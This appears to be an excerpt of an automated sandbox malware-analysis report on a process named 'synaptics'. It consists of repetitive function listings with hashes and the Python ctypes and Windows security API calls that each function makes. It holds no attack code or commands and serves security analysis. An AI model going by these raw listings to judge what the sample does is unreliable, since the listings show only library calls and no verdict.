                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Err_$String$Arg_Eval_ParseSizeThreadTuple_$AddressAttrAuditFormatLong_Object_OccurredProcRestoreSaveSequence_Sys_TupleVoid
                                                                                                                                                                                                              • String ID: O&O;illegal func_spec argument$O|O$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$function '%s' not found$function ordinal %d not found$the _handle attribute of the second argument must be an integer
                                                                                                                                                                                                              • API String ID: 2122403954-1088195083
                                                                                                                                                                                                              • Opcode ID: 634624dd38be8b4e998f31f3a81e17e0907c4a05c46cdeef77d2cc053def76a2
                                                                                                                                                                                                              • Instruction ID: dc6f09963d7c3b9784da67b16c27b7fc9e71419411784b4f3cf4000fc19d33c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 634624dd38be8b4e998f31f3a81e17e0907c4a05c46cdeef77d2cc053def76a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B861E4B4E04605AFDB00CBE8DD41AAE77F8FF05628F100665E91AE3741EB32DA15CB95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_InternFromString.PYTHON310(_ctypes.DllGetClassObject), ref: 6C0A8F6A
                                                                                                                                                                                                              • PyImport_ImportModuleNoBlock.PYTHON310(ctypes), ref: 6C0A8F7E
                                                                                                                                                                                                              • PyErr_WriteUnraisable.PYTHON310(6C7F20B8), ref: 6C0A8F9E
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(00000000,DllGetClassObject,00000000), ref: 6C0A8FB9
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A8FD3
                                                                                                                                                                                                              • PyLong_FromVoidPtr.PYTHON310(?), ref: 6C0A8FE9
                                                                                                                                                                                                              • PyLong_FromVoidPtr.PYTHON310(?), ref: 6C0A8FF1
                                                                                                                                                                                                              • PyLong_FromVoidPtr.PYTHON310(?), ref: 6C0A8FF8
                                                                                                                                                                                                              • PyObject_CallFunctionObjArgs.PYTHON310(?,?,00000000,00000000,00000000), ref: 6C0A9022
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A9037
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A9042
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A904D
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A905B
                                                                                                                                                                                                              • PyLong_AsLong.PYTHON310(?), ref: 6C0A906C
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A9077
                                                                                                                                                                                                              • PyErr_WriteUnraisable.PYTHON310(6C7F20B8), ref: 6C0A9092
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A90A6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A90BA
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A90C9
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A90D8
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A90E6
                                                                                                                                                                                                              • PyErr_WriteUnraisable.PYTHON310(6C7F20B8), ref: 6C0A90FC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Err_FromLong_$UnraisableVoidWrite$Object_String$ArgsAttrBlockCallFunctionImportImport_InternLongModuleOccurredUnicode_
                                                                                                                                                                                                              • String ID: DllGetClassObject$_ctypes.DllGetClassObject$ctypes
                                                                                                                                                                                                              • API String ID: 2892314054-177550262
                                                                                                                                                                                                              • Opcode ID: 2099dd757dc2226353261d6fe7bb4f524fa7b0843e1bc38de2718c492e804c35
                                                                                                                                                                                                              • Instruction ID: 1ea7e6bea56e8106e514c9579f43afca5b0b6817f9b1a3fd1762fae8f3e5f9b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2099dd757dc2226353261d6fe7bb4f524fa7b0843e1bc38de2718c492e804c35
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC51F3F1F04215AFDF10DBFA9D44B8A37F89F0137CF050764ED69A6681EA3399118A86
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BF466A3
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EADFC,Unable to allocate %d bytes,?), ref: 6BF466BE
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BF466DA
                                                                                                                                                                                                              • MakeAbsoluteSD.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 6BF46708
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AbsoluteErr_FormatMakemallocmemset
                                                                                                                                                                                                              • String ID: MakeAbsoluteSD$Unable to allocate %d bytes
                                                                                                                                                                                                              • API String ID: 1436552674-2673133291
                                                                                                                                                                                                              • Opcode ID: f8cda257cc7c2136cfcbd99967ccf5c0fb538788e0abae2b23756fefed89f6c6
                                                                                                                                                                                                              • Instruction ID: ea9873af13aa6217d419227c327842d676b6ea9c0febef9c90ecc32b1adc38a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8cda257cc7c2136cfcbd99967ccf5c0fb538788e0abae2b23756fefed89f6c6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 896183B2618301AFE700DF65CC45B5BBBE8EF85744F4008A9F944D6261E77AD618CBA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam '%c' (%d)>,?,?), ref: 6C0A97E3
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam '%c' (%d)>,?,?), ref: 6C0A97FB
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam '%c' (%d)>,?,?), ref: 6C0A9811
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam '%c' (%ld)>,?,?), ref: 6C0A9827
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam '%c' (%lld)>,?,?,?), ref: 6C0A9840
                                                                                                                                                                                                              • PyFloat_FromDouble.PYTHON310 ref: 6C0A986A
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam '%c' ('%c')>,?,?), ref: 6C0A98C5
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam '%c' (%p)>,?,?), ref: 6C0A98F7
                                                                                                                                                                                                              • _PyUnicode_IsPrintable.PYTHON310(?), ref: 6C0A990D
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam '%c' at %p>,?,?), ref: 6C0A992F
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<cparam 0x%02x at %p>,?,?), ref: 6C0A9947
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FromUnicode_$Format$DoubleFloat_Printable
                                                                                                                                                                                                              • String ID: <cparam '%c' (%R)>$<cparam '%c' (%d)>$<cparam '%c' (%ld)>$<cparam '%c' (%lld)>$<cparam '%c' (%p)>$<cparam '%c' ('%c')>$<cparam '%c' ('\x%02x')>$<cparam '%c' at %p>$<cparam 0x%02x at %p>
                                                                                                                                                                                                              • API String ID: 999643515-1075073485
                                                                                                                                                                                                              • Opcode ID: 874aa758c0fb859f9923e779eb0f7f03f07f5b4c2cab5de7f992404731028081
                                                                                                                                                                                                              • Instruction ID: 653d3af52149dc2120d5a34610156b1ce77c32702544890f60734fb304473fc6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 874aa758c0fb859f9923e779eb0f7f03f07f5b4c2cab5de7f992404731028081
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C412DB26045506FDB1197E97C089BBBBFCFE4123EB080E1AF59EC4911D63390648B55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyIndex_Check.PYTHON310(?), ref: 6C0A642D
                                                                                                                                                                                                              • PyNumber_AsSsize_t.PYTHON310(?,6C7EA174), ref: 6C0A6442
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A6455
                                                                                                                                                                                                              • PySlice_Unpack.PYTHON310(?,?,?,?), ref: 6C0A649C
                                                                                                                                                                                                              • PySlice_AdjustIndices.PYTHON310(?,?,?,?), ref: 6C0A64BE
                                                                                                                                                                                                              • PyBytes_FromStringAndSize.PYTHON310(6C0B1367,00000000), ref: 6C0A6528
                                                                                                                                                                                                              • PyBytes_FromStringAndSize.PYTHON310(?,00000000), ref: 6C0A6545
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Bytes_FromSizeSlice_String$AdjustCheckErr_Index_IndicesNumber_OccurredSsize_tUnpack
                                                                                                                                                                                                              • String ID: 0bal$indices must be integers
                                                                                                                                                                                                              • API String ID: 1221697064-3612932319
                                                                                                                                                                                                              • Opcode ID: 1a6c99ab7b7bda1d45dd3b901109dfd19f702c2d507d0654a1996b46146246f2
                                                                                                                                                                                                              • Instruction ID: 269e3eec435ef599372d5bc221e3d83d54c6e54ce2934a9f07a9f074c9482860
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a6c99ab7b7bda1d45dd3b901109dfd19f702c2d507d0654a1996b46146246f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B910172B051089BCB00CFE8E984AD9B7F8EF4622AF1445B5ED0DD7602EB32D9568791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyDict_ContainsId.PYTHON310(?,6C0B62FC), ref: 6C0A14A1
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A14CA
                                                                                                                                                                                                                • Part of subcall function 6C0A1070: PyThreadState_Get.PYTHON310(?,?,6C0A14BE), ref: 6C0A1074
                                                                                                                                                                                                                • Part of subcall function 6C0A1070: _Py_CheckFunctionResult.PYTHON310(00000000,6C0B6110,00000000,00000000), ref: 6C0A10A0
                                                                                                                                                                                                              • PyDict_Update.PYTHON310(00000000,?), ref: 6C0A14F0
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A1509
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A1514
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A1534
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310(00000002), ref: 6C0A153B
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310 ref: 6C0A154A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A155D
                                                                                                                                                                                                              • _PyDict_GetItemIdWithError.PYTHON310 ref: 6C0A1596
                                                                                                                                                                                                              • _PyObject_SetAttrId.PYTHON310(00000000,6C0B64BC,00000000,00000000,6C0B64BC), ref: 6C0A15AA
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310(00000000,6C0B64BC), ref: 6C0A15D8
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6C0A1608
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6C0A160D
                                                                                                                                                                                                              • PyMem_Free.PYTHON310 ref: 6C0A1619
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310(?), ref: 6C0A169D
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310(?), ref: 6C0A16CD
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0A16E8
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310(?), ref: 6C0A1704
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310 ref: 6C0A1714
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C0A1726
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mem_$Dealloc$Malloc$Dict_Err_Free$Memorymemcpy$AttrCheckContainsErrorFunctionItemObject_OccurredResultState_ThreadUpdateWith
                                                                                                                                                                                                              • String ID: 0bal
                                                                                                                                                                                                              • API String ID: 4002546625-2732478310
                                                                                                                                                                                                              • Opcode ID: f5278156d5279dafe4416782aea23ae9a75f8549da27fbfc14134904dc64425d
                                                                                                                                                                                                              • Instruction ID: db99c61d2a6317e4be3dbaf27e874e5953cfe7620be12a5cb8a1085503cb6193
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5278156d5279dafe4416782aea23ae9a75f8549da27fbfc14134904dc64425d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74910270A04B42DBDB048FF9D940796B7F8FF0531CF081668E85AD6A52EB32E516CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyDict_GetItemWithError.PYTHON310(?), ref: 6C0AB17E
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0AB192
                                                                                                                                                                                                              • PyUnicode_AsUTF8.PYTHON310(?), ref: 6C0AB1B0
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310(00000005), ref: 6C0AB1D5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dict_Err_ErrorItemMallocMem_OccurredUnicode_With
                                                                                                                                                                                                              • String ID: 0bal$LP_%s$_type_$must be a ctypes type$s(O){sO}$s(O){}
                                                                                                                                                                                                              • API String ID: 1579899749-179170726
                                                                                                                                                                                                              • Opcode ID: 532011e3da5d06d0eb24ade13712fcc8ba04c42119ce6e20ef31eff19b314fa2
                                                                                                                                                                                                              • Instruction ID: cac070140f49a5b9594f447d956c11f652581686e73d4a46ba3429fc22c6a1aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 532011e3da5d06d0eb24ade13712fcc8ba04c42119ce6e20ef31eff19b314fa2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76414776609104ABCB019BE5ED48ADA7BF8EF4237D7144B31EA1ED2502DB33D0178798
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,llOii:AddAuditAccessAce,?,?,?,?), ref: 6BF42CCF
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PySID object), ref: 6BF42CF5
                                                                                                                                                                                                              • AddAuditAccessAce.ADVAPI32(?,?,?,?,?,?), ref: 6BF42D1D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF42D2B
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(AddAuditAccessAce,00000000), ref: 6BF42D3E
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6BF42D4F
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9D44,%s: adding ACE would put ACL over size limit,PyACL::AddAuditAccessAce), ref: 6BF42D77
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF42D89
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EADFC,AddAuditAccessAce: unable to allocated %d bytes,?), ref: 6BF42DA5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s: adding ACE would put ACL over size limit, xrefs: 6BF42D70
                                                                                                                                                                                                              • llOii:AddAuditAccessAce, xrefs: 6BF42CC6
                                                                                                                                                                                                              • AddAuditAccessAce: unable to allocated %d bytes, xrefs: 6BF42D9E
                                                                                                                                                                                                              • The object is not a PySID object, xrefs: 6BF42CEE
                                                                                                                                                                                                              • AddAuditAccessAce, xrefs: 6BF42D39, 6BF42E21
                                                                                                                                                                                                              • PyACL::AddAuditAccessAce, xrefs: 6BF42D6B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$Format$AccessArg_AuditErrorError@@LastLengthParseStringTupleU_object@@Win_malloc
                                                                                                                                                                                                              • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessAce$AddAuditAccessAce: unable to allocated %d bytes$PyACL::AddAuditAccessAce$The object is not a PySID object$llOii:AddAuditAccessAce
                                                                                                                                                                                                              • API String ID: 2481168113-240227349
                                                                                                                                                                                                              • Opcode ID: baeb30ac6d27099973147d195d003f1e0dec1582e4ee5b341791963edbddecdd
                                                                                                                                                                                                              • Instruction ID: 1c67f9d96304f96f77641a0c8918a414ed6f257d1ec439296d828eef8e42ffa3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: baeb30ac6d27099973147d195d003f1e0dec1582e4ee5b341791963edbddecdd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41F573520100ABC701AB68DC44EABBFA8EF86615F4104B5FA09C6137D72BD52D97B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,l:GetAce), ref: 6BF43390
                                                                                                                                                                                                              • GetAce.ADVAPI32(?,?,?), ref: 6BF433B1
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(GetAce,00000000), ref: 6BF433C1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Error@@ParseTupleU_object@@Win_
                                                                                                                                                                                                              • String ID: (ll)lN$(ll)lNNN$Ace type %d is not supported yet$GetAce$l:GetAce
                                                                                                                                                                                                              • API String ID: 1264128360-3095649356
                                                                                                                                                                                                              • Opcode ID: 5af6b5e70b8d5358ec75b845a6f8438adf7265f005273a402a81d62eda9e4987
                                                                                                                                                                                                              • Instruction ID: 13ac502211241d802888420065fdd0cd8c290cf8f14fea7813f3f8f7475d5b38
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5af6b5e70b8d5358ec75b845a6f8438adf7265f005273a402a81d62eda9e4987
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9351E4B3914102AFDB11EFA4DC41A66BFA8EF09215F440575ED09C3233E729D928CBB1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_FromFormatV.PYTHON310(6C7E9A14,6C0A4777,6C0A4777,6C7E9A14,(%s) ,?), ref: 6C0AA0DD
                                                                                                                                                                                                              • PyErr_Fetch.PYTHON310(?,?,?,00000000,6C5671B0), ref: 6C0AA0FF
                                                                                                                                                                                                              • PyErr_NormalizeException.PYTHON310(?,?,?), ref: 6C0AA111
                                                                                                                                                                                                              • _PyType_Name.PYTHON310 ref: 6C0AA12D
                                                                                                                                                                                                              • PyUnicode_FromString.PYTHON310(00000000), ref: 6C0AA134
                                                                                                                                                                                                              • PyObject_Str.PYTHON310 ref: 6C0AA13B
                                                                                                                                                                                                              • PyUnicode_AppendAndDel.PYTHON310(?,00000000,?), ref: 6C0AA153
                                                                                                                                                                                                              • PyUnicode_FromString.PYTHON310(6C0B266C), ref: 6C0AA15A
                                                                                                                                                                                                              • PyUnicode_AppendAndDel.PYTHON310(?,00000000), ref: 6C0AA161
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310(?), ref: 6C0AA16E
                                                                                                                                                                                                              • PyObject_Str.PYTHON310(?), ref: 6C0AA177
                                                                                                                                                                                                              • PyUnicode_AppendAndDel.PYTHON310(?,00000000), ref: 6C0AA189
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6C0AA190
                                                                                                                                                                                                              • PyUnicode_FromString.PYTHON310(???), ref: 6C0AA19B
                                                                                                                                                                                                              • PyUnicode_AppendAndDel.PYTHON310(?,00000000), ref: 6C0AA1A2
                                                                                                                                                                                                              • PyErr_SetObject.PYTHON310(?,?), ref: 6C0AA1B2
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0AA1CE
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0AA1E0
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0AA1F2
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0AA204
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unicode_$Err_$AppendDeallocFrom$String$ClearObject_$ExceptionFetchFormatNameNormalizeObjectType_
                                                                                                                                                                                                              • String ID: ???
                                                                                                                                                                                                              • API String ID: 2548131735-1053719742
                                                                                                                                                                                                              • Opcode ID: 9629f52cee51421b379f7117d1dada5ee38c98f9501957c8bd89a7bd68417735
                                                                                                                                                                                                              • Instruction ID: 1df81fa8088d588374be8b4b7fd9edcdbeb9e411df67be4e04a63eff90c7bf5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9629f52cee51421b379f7117d1dada5ee38c98f9501957c8bd89a7bd68417735
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68414DB1E04109ABDF00DBE4CD44ADF77FCAF01618F240662E915D2181EB32DA15CFA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EB154,%s not supported by this version of Windows,AddAccessAllowedObjectAce), ref: 6BF429B9
